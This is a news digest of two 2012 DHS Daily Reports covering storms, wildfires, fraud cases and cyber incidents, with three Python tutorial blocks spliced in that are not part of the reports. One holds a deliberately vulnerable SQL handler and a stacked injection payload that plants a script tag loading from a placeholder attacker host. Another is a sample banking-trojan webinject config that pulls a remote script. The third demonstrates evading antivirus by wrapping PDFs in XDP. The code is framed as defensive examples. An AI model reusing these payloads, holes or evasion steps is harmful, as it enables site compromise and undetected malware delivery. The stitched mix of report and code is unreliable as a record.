Wednesday, June 20, 2012

Complete DHS Daily Report for June 20, 2012

Daily Report

Top Stories

• Powerful storms in the Minneapolis and St. Paul area cut power to 72,000 residents, downed trees that damaged vehicles and homes, and closed many roads. The storms also impacted drinking water and a water plant, and closed some businesses. – Minneapolis Star Tribune; Associated Press

2. June 19, Minneapolis Star Tribune; Associated Press – (Minnesota) Storms cause headaches across the Twin Cities. About 72,000 residents lost power in the Minneapolis and St. Paul, Minnesota area, June 19 after violent storms rumbled through the area. The powerful storms also knocked out power to the Burnsville water treatment plant, as well as downed trees that fell on homes and vehicles and blocked many streets in Burnsville, Hastings, and Lakeville. Residents in part of West St. Paul were told not to drink their tap water because electrical outages caused low pressure in part of the system, making it easier for harmful bacteria to enter the system. The Burnsville water plant was operating on an emergency generator, and city officials stressed the water was safe for drinking. Xcel Energy said that by the early afternoon it had cut the number of residents without power to 20,500, but noted that some areas of Washington County could take as long as 2 days to receive restored power. The storms also knocked out power to Battle Creek Waterworks, and as a result the water park was closed June 19. Source:

• Thousands of gallons of mineral oil, which helps cool transformers, were stolen from two substations in South Carolina. A Duke Energy spokesman said the company may bolster security measures as a result. – Spartanburg Herald-Journal

4. June 18, Spartanburg Herald-Journal – (South Carolina) Thieves steal thousands of gallons of mineral oil from Duke Energy in Blacksburg. A Duke Energy spokesman said thousands of gallons of mineral oil, which helps cool transformers, were discovered stolen from two locations in South Carolina’s Cherokee County. In the most recent theft, reported June 14, thousands of gallons of oil were stolen from a transformer in Blacksburg. There was also a spill of several hundred gallons, which required clean-up by a contracted hazardous materials crew. The oil did not pose an environmental threat. A theft was reported June 12 from six transformers at a substation adjacent to a vacant manufacturing plant. A spokesman said someone apparently used a large hose, similar to a fire hose, to siphon the oil, likely into a tanker truck. Duke said costs of damage and clean-up are in the thousands of dollars. Duke Energy officials are familiar with copper thefts from substations, but mineral oil theft is unusual. The thefts are under investigation by the Cherokee County Sheriff’s Office. “We do have adequate security at our substations,” the Duke spokesman said. “But after this, we will take steps to assess the situation and look at other measures.” Source:

• A federal agency found that scores of first responders at New York City’s John F. Kennedy Airport were not qualified to handle emergencies. –

20. June 18, – (New York; New Jersey) First responders at JFK Airport unqualified to handle emergencies, feds say. A federal agency found scores of first responders at New York City’s John F. Kennedy (JFK) Airport were not qualified to handle emergencies, reported June 18. Federal Aviation Administration (FAA) investigators found the overwhelming majority of the nearly 200 cops at JFK either lacked the proper certification to respond to such emergencies or had seen their certifications expire, sources said. The FAA’s revelation forced the Port Authority of New York and New Jersey to pull the unqualified officers and force the certified personnel to work overtime to cover the gaps, sources said. They said similar issues were found at New York City’s LaGuardia and New Jersey’s Newark International Airport, but they were not as severe as the ones found at JFK. The problem at JFK was discovered around April, when the FAA conducted an annual review to determine if the airport had enough properly trained officers to handle any emergency. A spokesman for the FAA said it “is currently reviewing a discrepancy in training records for aircraft rescue and firefighting training at John F. Kennedy International Airport.” Source:

• New evidence suggests a Web site hosting software updates for life-saving medical equipment may have been redirecting visitors to a site distributing attacks and malware for months before the company became aware of the compromise. – Threatpost

30. June 18, Threatpost – (International) Infections at medical device firm lasted for months. New evidence suggests a Web site hosting software updates for life-saving medical equipment was the victim of a massive SQL injection attack and may have been redirecting visitors to a site distributing attacks and malicious software for months before the company became aware of the compromise, Threatpost reported June 18. The Web site viasyshealthcare(dot)com was infected for more than 2 months — from March 23, 2012 to May 31, 2012 — according to data from the anti-spam Web site Clean MX. The length of the compromise makes it likely that CareFusion’s customers — hospitals and other medical offices — were exposed to Web-based attacks when they attempted to download software updates for the firm’s medical devices. Viasyshealthcare(dot)com is a Web property that belongs to health care equipment maker CareFusion and is used to distribute software updates for CareFusion’s Alaris-brand infusion pumps and AVEA, AirLife, and LTV series ventilation and respiratory products. The infection on CareFusion’s software update site was detected after an assistant professor at the University of Massachusetts, Amherst, noticed that the Web site offering an update was blocked by Google’s Safe Browsing service because it was distributing malicious content. The assistant professor contacted CareFusion, the Department of Homeland Security (DHS), and the Food and Drug Administration. While the exact source of the attack is unknown, an analysis by DHS revealed CareFusion was lax in updating the software used to host viasyshealthcare(dot)com. Some of CareFusion’s Web sites were running 6-year-old versions of ASP.NET and Microsoft Internet Information Services (IIS) 6.0, the version released with Windows Server 2003. Both platforms have known, critical vulnerabilities and are highly susceptible to compromise if not patched and properly managed. DHS’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) is working with CareFusion to address the widespread infection. Source:
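The injection-and-redirect mechanism behind item 30, as an added example in Python that is not part of the report and not CareFusion's code: a request handler that pastes parameters into SQL text (the pattern a stacked-query mass injection exploits) beside its hardened form, and an audit query that finds stored pages pulling a script from a host outside the site, which is what a visitor's browser would have been redirected by. The schema, rows, host names and payload are constructed for the example, and SQLite stands in for whatever database sat behind the ASP.NET site.

```python
import re
import sqlite3
from urllib.parse import urlsplit

# Constructed schema and rows standing in for an update site's CMS database
# (hypothetical; the report gives no details of CareFusion's actual database).
SCHEMA = """
CREATE TABLE products  (id INTEGER PRIMARY KEY, name TEXT, download TEXT);
CREATE TABLE downloads (product_id INTEGER, client_ip TEXT);
CREATE TABLE pages     (id INTEGER PRIMARY KEY, body TEXT);
INSERT INTO products VALUES (1, 'Pump software 9.1', '/updates/pump-9.1.zip');
INSERT INTO pages VALUES (1, '<h1>Software updates</h1><p>Select a product.</p>');
INSERT INTO pages VALUES (2, '<h1>Support</h1><script src="/static/site.js"></script>');
"""

# Attacker-supplied value for the product_id request parameter. The stacked
# UPDATE is the shape of payload 2012-era mass SQL injection campaigns used to
# plant a script tag in every stored page; the host is a placeholder.
PAYLOAD = ("1, '0.0.0.0'); UPDATE pages SET body = body || "
           "'<script src=\"http://bad.example/x.js\"></script>'; --")

def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def record_download_vulnerable(conn, product_id, client_ip):
    """Request parameters pasted into the SQL text and run with executescript(),
    which executes every statement in the string, including the attacker's."""
    sql = (f"INSERT INTO downloads (product_id, client_ip) "
           f"VALUES ({product_id}, '{client_ip}');")
    conn.executescript(sql)

def record_download_hardened(conn, product_id, client_ip):
    """Validate the type, then bind the values; bound values are never parsed
    as SQL, so a payload cannot add statements."""
    pid = int(product_id)            # ValueError on anything but an integer
    conn.execute("INSERT INTO downloads (product_id, client_ip) VALUES (?, ?)",
                 (pid, client_ip))
    conn.commit()

def download_count(conn):
    return conn.execute("SELECT COUNT(*) FROM downloads").fetchone()[0]

SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']?([^"\'\s>]+)', re.I)

def pages_with_foreign_scripts(conn, allowed_hosts):
    """Audit stored pages for <script src> that points at a host outside the
    site. Returns {page_id: [src, ...]} for every page that has one."""
    hits = {}
    for page_id, body in conn.execute("SELECT id, body FROM pages"):
        foreign = [src for src in SCRIPT_SRC.findall(body)
                   if urlsplit(src).netloc
                   and urlsplit(src).netloc.lower() not in allowed_hosts]
        if foreign:
            hits[page_id] = foreign
    return hits

def demo(allowed_hosts=frozenset({"updates.example"})):
    """Run the payload through both versions and audit the result of each."""
    tainted_db = fresh_db()
    record_download_vulnerable(tainted_db, PAYLOAD, "203.0.113.5")
    tainted = pages_with_foreign_scripts(tainted_db, allowed_hosts)

    clean_db = fresh_db()
    try:
        record_download_hardened(clean_db, PAYLOAD, "203.0.113.5")
        rejected = False
    except ValueError:
        rejected = True
    record_download_hardened(clean_db, "1", "203.0.113.5")   # legitimate request
    clean = pages_with_foreign_scripts(clean_db, allowed_hosts)
    return tainted, rejected, clean, download_count(clean_db)

if __name__ == "__main__":
    print(demo())
```

The audit function is the part worth keeping: run it against the content tables of any site that serves downloads, with the allowlist set to the site's own hosts, and a planted off-site script shows up whether it arrived through SQL injection or some other route.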

• Wind-driven wildfires torched hundreds of acres, forced the closure of some state parks, closed many roads, and forced the evacuation of a small hospital on the Hawaiian islands of Maui and Hawaii. – Honolulu Star-Advertiser

46. June 19, Honolulu Star-Advertiser – (Hawaii) Homes damaged, hospital evacuated due to brush fires on Maui, Hawaii Island. Wind-driven wildfires torched hundreds of acres, forced the closure of some state parks, closed many roads, and forced the evacuation of a small hospital on the Hawaiian islands of Maui and Hawaii, June 18. On Maui, residents in Kula were evacuated, said a Maui Fire Department fire services chief. Meanwhile, firefighters from the State Department of Forest and Wildlife battled a separate fire in the Makawao State Forest Reserve above the Kahakapao reservoir near Olinda. About 4 acres were burned, said a State Department of Land and Natural Resources spokeswoman. State officials closed the Kula State Forest Reserve, including Polipolii Spring State Park, due to high winds and the danger of falling trees and branches. About 10 individuals camping at the park or in other parts of Haleakala National Park were evacuated. In Hawaii County, more than 50 firefighters were battling fires on two fronts totaling an estimated 650 acres in Pahala, on the southern end of the island, an assistant fire chief said. Mamalahoa Highway was shut down for 7 hours. Firefighters were more concerned about a fire that burned near a community hospital, which was evacuated to the Naalehu Community Center. Source:


Banking and Finance Sector

13. June 19, BankInfoSecurity – (California) Settlement reached in ACH fraud case. A lingering legal dispute over a corporate account takeover incident at an escrow company in Redondo Beach, California finally came to a close, BankInfoSecurity reported June 19. Village View Escrow Inc., which in March 2010 lost nearly $400,000 after its online bank account with Professional Business Bank was taken over by hackers, reached a settlement with the bank for an undisclosed amount, according to Village View’s owner and president. As a result of the settlement, Village View recovered more than the full amount of the funds that had been fraudulently taken from the account, plus interest, the company said in a statement. More details about the settlement were expected to be issued in coming weeks. Source:

14. June 19, IDG News Service – (International) Fake Android antivirus app likely linked to Zeus banking Trojan, researchers say. A recently discovered fake Android security application is most likely a mobile component of the Zeus banking malware, security researchers from antivirus firm Kaspersky Lab said June 18. Called Android Security Suite Premium, the rogue app is capable of stealing SMS messages and uploading them to a remote server. When launched, the app displays a shield image that has long been associated with Windows fake antivirus programs. However, this might not be a mobile scareware app but a new variant of ZitMo — Zeus in the Mobile, a Kaspersky Lab senior malware analyst said. ZitMo’s purpose is to steal mobile transaction authorization numbers (mTANs) sent by banks to customers via SMS messages. Without the mTANs, fraudsters would not be able to authorize transactions initiated with stolen credentials. The registration information for the domain names to which Android Security Suite Premium uploads stolen SMS messages matches the registration information for 2011 Zeus command-and-control domains. This, coupled with the app’s SMS-stealing functionality, makes it likely that this is a new ZitMo version. Source:

15. June 18, Federal Bureau of Investigation – (Texas; Alabama) Three Houston men charged in $68M bank fraud. The FBI announced June 18 the indictment of three Houston-area men on federal conspiracy, wire fraud, and bank fraud charges, and a guilty plea by another man for an information charging conspiracy to make a false statement to a bank. Two of the men were senior figures at H and H Worldwide Financial Service Inc., while another was an attorney in the Houston area, and the final member a stockbroker employed by Tri-Star Financial Services. In February 2005, the H and H director began soliciting loans from the Federal Land Bank of South Alabama. He falsely claimed he had a large bond portfolio that could serve as collateral for the loans and submitted documents that concealed his plan to use about half the loan proceeds to purchase the bonds that were going to serve as collateral. The stockbroker provided documents to the bank to support the bond ownership claim. The bank made two loans to H and H totaling $68.5 million. H and H used more than half the money to buy the bonds that were to serve as collateral. A significant amount of the loan proceeds were used for the personal benefits of the conspirators. Source:

16. June 18, IDG News Service – (International) Data in possible credit card breach appears to be old. A batch of names, addresses, e-mails, and phone numbers of credit card customers around the world released June 18 purported to show a breach of a payment processor, but the data appeared to be old, IDG News Service reported. A hacker nicknamed “Reckz0r” posted a link to the data dump on Pastebin, and wrote on Twitter he had “penetrated over 79 large banks” and holds 50GB of data on MasterCard and Visa cardholders. No full card numbers were released, however. Attempts to reach some of the U.S. cardholders affected were unsuccessful, since many of the phone numbers were disconnected or incorrect. But another person on the list, in Australia, said the information was very old: the home address published for him is 7 years out of date, and the e-mail address published is at least 4 years old, the man said in a phone interview. The majority of the data appeared to come from U.S. cardholders, although other people listed purportedly live in countries including Egypt, Cambodia, Israel, Turkey, and Pakistan. The data includes only five digits of the credit card numbers and no expiration dates or three-digit security codes. The mix of international addresses indicates the target could have been an international payment processor, according to the head of CloudeyeZ, a security consultancy. Source:

17. June 18, Legal Times – (International) Feds: Millions of dollars intentionally damaged in criminal scheme. The U.S. Secret Service seized more than $4.24 million in currency that investigators believe was part of a money laundering scheme to acquire new bills in exchange for damaged dollars, the Legal Times reported June 18. Federal investigators said in a search warrant affidavit that more than a dozen packages of money submitted in a 2-year span since 2010 contained bills intentionally damaged through burning and chemical agents. Most of the money came from a bank in Argentina that agents did not identify in court papers unsealed the week of June 11 in U.S. District Court for the District of Columbia. The damaged cash was transmitted to the U.S. Treasury Department’s Bureau of Engraving and Printing, which runs a money replacement program. A Secret Service agent said in an affidavit the currency scheme was an attempt to use the printing bureau’s redemption system as a “money laundering machine.” Investigators said they found two fragments of a single bill in two separate packages, indicating the person wanted to receive, from the federal government, two new bills from one $100 bill. The fragments were identified through the serial number. Some of the bills appeared as if they were damaged by chemical means to make them appear older and more worn than they actually were. Source:

Information Technology Sector

36. June 19, H Security – (International) Joomla 2.5.5 security updates arrive with added features. Joomla! developers released version 2.5.5 of the open source content management system. The new version includes two security updates and fixes several bugs. Joomla! 2.5.5 allows users to copy templates under a new name and modify them later on. A new plugin for user profiles allows administrators to show terms of service agreements and require users to sign off on them. Administrators can also restrict which user names are available and how often users can request to reset their passwords during a given amount of time. Source:

37. June 18, Infosecurity – (International) Opera plugs six security holes in latest version of web browser. Opera released version 12 of its Web browser, which includes fixes for six security holes as well as the addition of a Do Not Track feature. Opera fixed the following security issues: hidden keyboard navigation that could allow cross-site scripting or code execution; a combination of clicks and key presses that could lead to cross-site scripting or code execution; cross-domain JSON resources that could be exposed as JavaScript variable data; carefully timed reloads, redirects, and navigation that could spoof the address field; pages that could prevent navigation to a target page, allowing spoofing of the address field; and a “moderate severity issue,” details of which will be disclosed at a “later date.” Source:

For more stories, see items 13, 14, and 16, above in the Banking and Finance Sector and 30 above in Top Stories

Communications Sector

38. June 18, WALB 10 Albany – (Georgia) Thieves steal equipment from Christian radio station. Thieves knocked a Christian radio station in Tifton, Georgia, off the air June 18. They broke into the station and stole thousands of dollars worth of equipment from Hook FM, specifically targeting production equipment and leaving other valuable items behind. There was no sign of forced entry. The station spent several hours off the air. Police found the Hook FM vehicle about a mile from the station. The thieves used the vehicle to transport the thousands of dollars in production equipment taken from inside, ranging from cameras to specialized computers. A popular country station was also hit, the sister station WTIF 107.5, which is located in the same building as Hook FM. Shortly after disc jockeys informed listeners about what happened, a person from Ashburn found some of the equipment behind Ole Times Country Buffett. Employees said it was the only piece of equipment taken that had a Hook FM logo on it. Source:

For another story, see item 14 above in the Banking and Finance Sector

Tuesday, June 19, 2012

Complete DHS Daily Report for June 19, 2012

Daily Report

Top Stories

• Federal regulators determined design flaws appear to be the cause of excessive wear in tubing that carries radioactive water, a problem that has kept the San Onofre nuclear power plant in San Diego County idled since January. – Associated Press

5. June 18, Associated Press – (California) Feds: Design flaws at Calif. nuke plant behind leak. After months of investigation, federal regulators determined design flaws appear to be the cause of excessive wear in tubing that carries radioactive water through the San Onofre nuclear power plant in San Diego County, California, the Associated Press reported June 18. The twin-reactor plant has been idle since January, after a tube break in one of four steam generators released traces of radiation. A team of federal investigators was dispatched in March after the discovery that some tubes were so badly corroded they could fail. Flaws in fabrication or installation were considered as possible sources of the rapid decay but “it looks primarily we are pointed toward the design” of the heavily modified generators, a Nuclear Regulatory Commission regional administrator told the Associated Press in an interview. “It’s these four steam generators that either have, or are susceptible to, this type of problem,” he said, referring to the unusual damage caused when alloy tubes vibrate and rattle against each other or brackets that hold them in place. Source:

• Michigan’s unusually warm March followed by overnight freezes in April devastated many of the State’s largest fruit farms. The climate caused what some federal officials called the worst weather damage to fruit in the State in the past 50 years. – Detroit Free Press

17. June 17, Detroit Free Press – (Michigan) Volatile climate tough on Michigan’s fruit crops. Michigan’s unusually warm March followed by overnight freezes in April devastated many of the State’s largest fruit farms, the Detroit Free Press reported June 17. The U.S. Department of Agriculture’s (USDA) Michigan field office described the impact as the “worst weather damage to fruit in the state in the past half-century.” The State, which produced 70.9 percent of the nation’s tart cherries in 2010, is expected to harvest a mere 2 million pounds of tarts in 2012, down from 135 million pounds in 2010 and 266 million pounds in 2009, according to the Michigan Frozen Food Packers Association. Other crops damaged by this spring’s volatile climate include apples, peaches, juice grapes — and even maple syrup. “It’s going to be pretty tough financially on these producers, and it’s going to be pretty difficult on the handlers,” said a Michigan Farm Bureau commodities specialist. It is also going to drive prices up — especially for cherries. One buyer said he expects wholesale prices to quadruple. Sales of fruit crops totaled $325.2 million in 2010, according to a report by the USDA and Michigan State University. Source:

• Police shot and killed a gunman to end a standoff at Scott & White Hospital in Temple, Texas, after he took several hospital staffers hostage in the emergency room common area June 17. – Associated Press

26. June 18, Associated Press – (Texas) Police kill gunman in standoff at Temple hospital. Police shot and killed a gunman to end a standoff at Scott & White Hospital in Temple, Texas, after he took several hospital staffers hostage in the emergency room common area June 17. Authorities were trying to determine what sparked the standoff. Police started negotiations when a hostage tried to grab the suspect’s gun. A Temple officer fatally shot the man to end the struggle. Source:

• More residents evacuated June 18 as fire crews faced powerful winds fueling wildfires that have burned hundreds of square miles. The fires have destroyed hundreds of homes and other structures in at least six States. – Associated Press

44. June 18, Associated Press – (National) More evacuations as winds fuel Colorado wildfire. More residents evacuated June 18 as fire crews faced another day of powerful winds fueling a wildfire that has charred more than 87 square miles of forested mountains in northern Colorado. Fire officials said crews were able to maintain most existing fire lines, with the fire chewing through about 1,000 more acres June 17. About 1,750 personnel were working on the fire, which was sparked by lightning and was 45 percent contained. The fire destroyed at least 181 homes, the most in State history. Also June 17, a fire erupted in the foothills west of Colorado Springs, prompting the evacuation of an unknown number of homes as well as some cabins, a Boy Scout camp, and a recreation area near the Elevenmile Canyon Reservoir, which provides water to the Denver area. The fire has spread to 450 acres and fire managers said it has the potential to grow much more in the dry, windy conditions. In southwest Colorado, a fire near Pagosa Springs grew to 11,617 acres and was 30 percent contained. It was sparked by lightning May 13. On June 17, deputies arrested a Denver man on charges including theft and impersonating a firefighter. In California, a wildfire that forced the evacuation of 150 homes in San Diego County surged to 800 acres June 18 and was 5 percent contained. In Nevada, crews fought a 22,000-acre fire north of Ely that burned a mobile home. In New Mexico, a wildfire destroyed 242 homes and businesses, and firefighters were working to increase containment while keeping an eye out for possible lightning. The roughly 60-square-mile Little Bear Fire in Ruidoso was 60 percent contained. In Arizona, firefighters were focusing on protecting electrical transmission lines near a 3,100-acre fire on the Tonto National Forest. The fire was 15 percent contained. Source:


Banking and Finance Sector

9. June 18, SecurityWeek – (International) Automatic transfer system evades security measures, automates bank fraud. On June 18 Trend Micro released a new report that identifies an Automatic Transfer System (ATS) that enables cybercriminals to circumvent many bank security measures and drain victims’ bank accounts without leaving visible signs of malicious activity. In the new whitepaper, “Automatic Transfer System, a New Cybercrime Tool”, Trend Micro examines the automatic transfer systems within two well-known crime kits, Zeus and SpyEye. Automatic transfer systems are added to the crime kits as part of the Webinject files. They arm criminals with the ability to move funds from a victim’s account without the victim being aware: while the victim is performing one type of action, the ATS is transferring money. “Various active ATSs currently found in the wild are being used by cybercriminals to conduct automated online financial fraud,” the whitepaper explains. “These versions use a common framework. Their base code does not change from one version to another. New functionality has been introduced in more recent versions, however, in order to address new security measures.” Source:
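The report says the ATS ships inside the kits' Webinject files. As an added example (Python, not from the report and not Trend Micro's code), here is a small parser for the Zeus/SpyEye webinject configuration layout that pulls out the targeted URL masks and the external scripts the injects load, which is what a defender needs for blocklists and hunting on proxy logs. The sample configuration, its hostnames and the script URL are constructed placeholders; the flag column after each URL mask (G/P/L in the sample) is carried through verbatim rather than interpreted.

```python
import re

# Constructed sample in the Zeus/SpyEye webinject layout: a set_url line with a
# URL mask and flag column, then data_before / data_inject / data_after blocks,
# each closed by data_end. Hosts and the script URL are placeholders.
SAMPLE_WEBINJECTS = """\
set_url https://online.bank-one.example/login* GP
data_before
<input type="password"*>
data_end
data_inject
<script src="https://ats.cdn.example/ats.js"></script>
data_end
data_after
</form>
data_end

set_url https://secure.bank-two.example/* GL
data_before
</head>
data_end
data_inject
<script>var ats_cfg = {limit: 5000};</script>
data_end
data_after
data_end
"""

SET_URL = re.compile(r"^set_url\s+(\S+)(?:\s+(\S+))?", re.I)
SCRIPT_SRC = re.compile(r'<script[^>]*\ssrc=["\']?([^"\'\s>]+)', re.I)
BLOCKS = ("data_before", "data_inject", "data_after")

def parse_webinjects(text):
    """Return one dict per set_url: {url, flags, before, inject, after}.
    The flag column is kept verbatim, not interpreted."""
    entries, current, block, buf = [], None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if block is not None:                      # inside a data_* block
            if line.lower() == "data_end":
                current[block] = "\n".join(buf)
                block, buf = None, []
            else:
                buf.append(raw)
            continue
        m = SET_URL.match(line)
        if m:
            current = {"url": m.group(1), "flags": m.group(2) or "",
                       "before": "", "inject": "", "after": ""}
            entries.append(current)
        elif line.lower() in BLOCKS and current is not None:
            block = line.lower()[len("data_"):]
    return entries

def target_hosts(entries):
    """Hosts named in the URL masks: which institutions the config goes after."""
    hosts = {re.sub(r"^[a-z]+://", "", e["url"], flags=re.I).split("/")[0]
             for e in entries}
    return sorted(hosts)

def injected_script_sources(entries):
    """External scripts the injects load: the ATS/C2 endpoints to block."""
    return sorted({src for e in entries for src in SCRIPT_SRC.findall(e["inject"])})

def mask_to_regex(mask):
    """Zeus masks use * as a wildcard."""
    return re.compile("^" + ".*".join(map(re.escape, mask.split("*"))) + "$", re.I)

def injects_for_url(entries, url):
    """Entries whose mask matches a request URL (flags are ignored here)."""
    return [e for e in entries if mask_to_regex(e["url"]).match(url)]

if __name__ == "__main__":
    cfg = parse_webinjects(SAMPLE_WEBINJECTS)
    print("targets :", target_hosts(cfg))
    print("scripts :", injected_script_sources(cfg))
    print("on login:", [e["url"] for e in
                        injects_for_url(cfg, "https://online.bank-one.example/login?lang=en")])
```

Fed a configuration recovered from an infected host, injected_script_sources gives the hosts to block at the proxy and target_hosts tells the bank's fraud team which login paths the kit was watching; the injected HTML itself can be diffed against what customers' browsers actually rendered.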

10. June 15, U.S. Department of Justice – (National; International) Three tax return preparers charged with helping clients evade taxes by hiding millions in secret accounts at two Israeli banks. Three men were indicted by a federal grand jury in California and charged with conspiring to defraud the United States, the U.S. Department of Justice and Internal Revenue Service (IRS) said June 15. The men were principals and employees of United Revenue Service Inc. (URS), a tax preparation business with 12 offices throughout the United States. The indictment alleges the co-conspirators prepared false individual income tax returns that did not disclose the clients’ foreign financial accounts nor report the income earned from those accounts. To conceal the clients’ ownership and control of assets and conceal their income from the IRS, the co-conspirators helped clients open secret bank accounts at the Luxembourg locations of two Israeli banks and incorporated offshore companies in Belize and elsewhere to act as the named account holders on those accounts. They then facilitated the transfer of client funds to the secret accounts and prepared and filed tax returns that falsely reported the money sent offshore as an investment loss or a business expense. Source:

11. June 15, Associated Press – (Florida; Georgia; Tennessee) Regulators close 3 banks in 3 States, bringing to 31 the number of US bank failures this year. Federal regulators seized three banks, one each in Florida, Georgia, and Tennessee, bringing the number to 31 of U.S. banks that have failed so far in 2012, the Associated Press reported June 15. The Federal Deposit Insurance Corporation (FDIC) said it closed Putnam State Bank in Palatka, Florida, Security Exchange Bank, in Marietta, Georgia, and The Farmers Bank of Lynchburg, in Lynchburg, Tennessee. The FDIC lined up other lenders to assume the deposits and assets of each of the banks. Regulators estimated that the failure of the three banks will cost the insurance fund $100 million. Source:

12. June 15, KXAS 5 Dallas-Fort Worth – (Texas) Skimming devices stumped Secret Service agent. A Secret Service agent who is an expert on gas pump skimmers said June 15 in court that he had never seen anything like the devices in a Tarrant County, Texas case. A man who is accused of stealing thousands of credit and debit card account numbers across north Texas is on trial in Tarrant County on felony identity charges. A Secret Service agent called the devices the man is accused of installing unique and sophisticated. He said it took him several weeks to figure out how to extract information from them. The devices came from gas pumps. A couple of the skimmers came from the man’s hotel room and his truck. Source:

Information Technology Sector

31. June 18, H Security – (International) Encoding malicious PDFs avoids detection. A security researcher discovered attackers can thwart detection by most common anti-virus software if they encode malicious PDF files in the XDP format. XDP is an XML-based file format that includes the PDF as a Base64-encoded data stream. XDP files are opened by Adobe Reader just like a normal PDF would be and can therefore infect systems in the same way. The researcher’s test document, which uses a 2-year-old security vulnerability in Adobe Reader, was detected by only one anti-virus package in his tests. After experimenting with the XDP format, he was able to create another file that fooled all 42 anti-virus engines used on VirusTotal. The exploit the researcher used has long since been patched, so the finding is about detection evasion rather than a new Reader vulnerability: a scanner that matches signatures against the raw file never sees the PDF’s contents once they are Base64-encoded inside the XML. To make sure their networks are not attacked, users should avoid XDP files in general until Adobe patches its software or the anti-virus companies fix their detection methods, experts said. Source:
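The XDP wrapping described above, as an added example in Python that is not from the researcher or from H Security: it wraps a constructed PDF carrying a harmless JavaScript action in an XDP envelope, shows that a byte-signature check on the raw file no longer fires, and unwraps the Base64 stream so the same checks run on the embedded PDF. The sample PDF is not an exploit, the element names of the envelope are assumed from Adobe's XDP packaging, and the extractor deliberately depends on nothing beyond locating a pdf element and decoding what is under it.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Constructed minimal PDF with an OpenAction that runs a harmless JavaScript
# alert; it stands in for the kind of content a scanner flags, not an exploit.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R >> endobj
4 0 obj << /S /JavaScript /JS (app.alert('hello')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Markers a simple static scanner keys on (active content, auto-open, launch).
PDF_MARKERS = [b"/JavaScript", b"/JS", b"/OpenAction", b"/Launch", b"/AA"]

def wrap_in_xdp(pdf_bytes):
    """Build an XDP envelope: XML carrying the PDF as a Base64 data stream.
    Element names follow Adobe's XDP packaging as assumed here."""
    b64 = base64.b64encode(pdf_bytes).decode("ascii")
    chunks = "\n".join(b64[i:i + 76] for i in range(0, len(b64), 76))
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">\n'
        '  <pdf xmlns="http://ns.adobe.com/xdp/pdf/">\n'
        f'    <document><chunk>\n{chunks}\n</chunk></document>\n'
        '  </pdf>\n'
        '</xdp:xdp>\n'
    ).encode("utf-8")

def naive_signature_hit(data):
    """What a raw byte signature sees: the marker is invisible once the PDF
    is Base64-encoded inside the XML."""
    return b"/JavaScript" in data

def extract_pdfs_from_xdp(data):
    """Decode every Base64 stream under a <pdf> element that yields a PDF."""
    found = []
    for el in ET.fromstring(data).iter():
        if el.tag.split("}")[-1].lower() != "pdf":
            continue
        blob = re.sub(r"\s+", "", "".join(el.itertext()))
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:              # binascii.Error is a ValueError
            continue
        if decoded.startswith(b"%PDF"):
            found.append(decoded)
    return found

def scan(data):
    """Classify a file; XDP envelopes are unwrapped so the embedded PDF gets
    the same marker checks as a plain PDF."""
    head = data[:4096]
    if data.lstrip().startswith(b"%PDF"):
        kind, pdfs = "pdf", [data]
    elif b"ns.adobe.com/xdp" in head:
        kind, pdfs = "xdp", extract_pdfs_from_xdp(data)
    else:
        return {"kind": "other", "embedded": 0, "markers": [], "suspicious": False}
    markers = sorted({m.decode() for p in pdfs for m in PDF_MARKERS if m in p})
    return {"kind": kind, "embedded": len(pdfs), "markers": markers,
            "suspicious": bool(markers)}

if __name__ == "__main__":
    wrapped = wrap_in_xdp(SAMPLE_PDF)
    print("raw signature on plain PDF:", naive_signature_hit(SAMPLE_PDF))
    print("raw signature on XDP      :", naive_signature_hit(wrapped))
    print("scan(XDP):", scan(wrapped))
```

The point of the unwrap step is that any check applied to PDFs at a mail gateway or proxy (marker matching here, a full parser in practice) must run on the decoded stream, and the same applies to anything else Reader will open that can carry a PDF inside another encoding.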

32. June 18, ZDNet – (International) Attack code published for ‘critical’ IE flaw; Patch your browser now. The week of June 11, when Microsoft released a critical Internet Explorer update, the company warned that working exploit code could be released within 30 days. Less than a week later, an exploit for one of the “critical” browser flaws was fitted into the freely available Metasploit point-and-click attack tool, and samples were released to Contagio, a blog that tracks live malware attacks. The addition of the exploit to Metasploit means cyber-criminals can now copy the attack code for use in exploit kits and other mass malware attacks. Source:

33. June 15, The Register – (International) ICANN eggfaced after publishing dot-word biz overlords’ personal info. After revealing the details of almost 2,000 new generic top-level domain (gTLD) applications, the Internet Corporation for Assigned Names and Numbers (ICANN) took all the applications offline June 15 after applicants complained their home addresses had been published by mistake. ICANN published the partial text of 1,930 gTLD bids during an event in London June 13. Only 30 of the 50 questions in each application were supposed to be revealed; details about financial performance, technical security, and personal contact information were supposed to be redacted. However, ICANN accidentally published the full contact information of each bid’s primary and secondary contact, including in many cases their home addresses. In several confirmed cases the named individuals were also senior officers and directors of the company applying. The Applicant Guidebook, the authoritative publication for the ICANN new gTLD process, specifically stated home addresses would not be published. Source:

For more stories, see items 9 and 12 above in the Banking and Finance Sector and 34 below in the Communications Sector

Communications Sector

34. June 18, ZDNet – (International) Amazon explains latest cloud outage: Blame the power. June 14, cloud provider Amazon suffered an outage to its Amazon Web Services in a north Virginia datacenter. Many popular Web sites, including Quora, Hipchat, and Heroku — a division of Salesforce — were knocked offline for hours during the evening. Dropbox also was affected by the outage. Several days later, Amazon explained the cause of the fault — which hit its Elastic Compute Cloud (EC2) service — was a power failure. Source:

35. June 17, Charleston Gazette – (West Virginia) Phone service outage reported in East Bank. More than 1,600 Frontier Communications customers in the East Bank area of Kanawha County in West Virginia were without phone service June 17, according to Metro 9-1-1’s Web site. Frontier employees were working to fix the problem. Source: